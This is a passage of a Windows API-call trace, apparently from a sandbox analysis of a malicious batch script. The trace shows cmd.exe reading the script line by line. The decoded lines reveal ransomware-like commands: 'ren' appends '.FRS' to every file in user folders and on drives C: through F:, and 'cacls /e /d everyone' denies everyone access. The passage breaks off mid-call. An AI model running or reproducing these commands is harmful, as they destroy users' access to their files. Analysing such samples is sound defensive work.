lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0099.366] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0099.366] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.366] GetFileType (hFile=0x2b8) returned 0x1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0099.366] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0099.366] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0099.366] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.366] GetFileType (hFile=0x2b8) returned 0x1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0099.366] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0099.366] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0099.366] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.366] GetFileType (hFile=0x2b8) returned 0x1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0099.367] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0099.367] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0099.367] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.367] GetFileType (hFile=0x2b8) returned 0x1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0099.367] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0099.367] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0099.367] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.367] GetFileType (hFile=0x2b8) returned 0x1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0099.367] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0099.367] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0099.367] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.367] GetFileType (hFile=0x2b8) returned 0x1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0099.367] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0099.367] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0099.367] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.367] GetFileType (hFile=0x2b8) returned 0x1 [0099.367] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0099.367] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0099.368] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0099.368] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.368] GetFileType (hFile=0x2b8) returned 0x1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0099.368] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0099.368] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0099.368] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.368] GetFileType (hFile=0x2b8) returned 0x1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0099.368] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0099.368] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0099.368] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.368] GetFileType (hFile=0x2b8) returned 0x1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0099.368] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0099.368] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0099.368] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.368] GetFileType (hFile=0x2b8) returned 0x1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0099.368] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.368] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0099.368] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0099.369] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.369] GetFileType (hFile=0x2b8) returned 0x1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0099.369] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0099.369] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0099.369] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.369] GetFileType (hFile=0x2b8) returned 0x1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0099.369] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0099.369] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0099.369] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.369] GetFileType (hFile=0x2b8) returned 0x1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0099.369] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0099.369] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0099.369] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.369] GetFileType (hFile=0x2b8) returned 0x1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0099.369] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0099.369] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0099.369] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0099.369] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.369] GetFileType (hFile=0x2b8) returned 0x1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0099.370] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0099.370] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0099.370] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.370] GetFileType (hFile=0x2b8) returned 0x1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0099.370] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0099.370] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0099.370] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.370] GetFileType (hFile=0x2b8) returned 0x1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0099.370] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0099.370] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0099.370] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.370] GetFileType (hFile=0x2b8) returned 0x1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0099.370] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0099.370] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0099.370] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.370] GetFileType (hFile=0x2b8) returned 0x1 [0099.370] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0099.371] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0099.371] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0099.371] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.371] GetFileType (hFile=0x2b8) returned 0x1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0099.371] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0099.371] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0099.371] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.371] GetFileType (hFile=0x2b8) returned 0x1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0099.371] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0099.371] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0099.371] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.371] GetFileType (hFile=0x2b8) returned 0x1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0099.371] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, 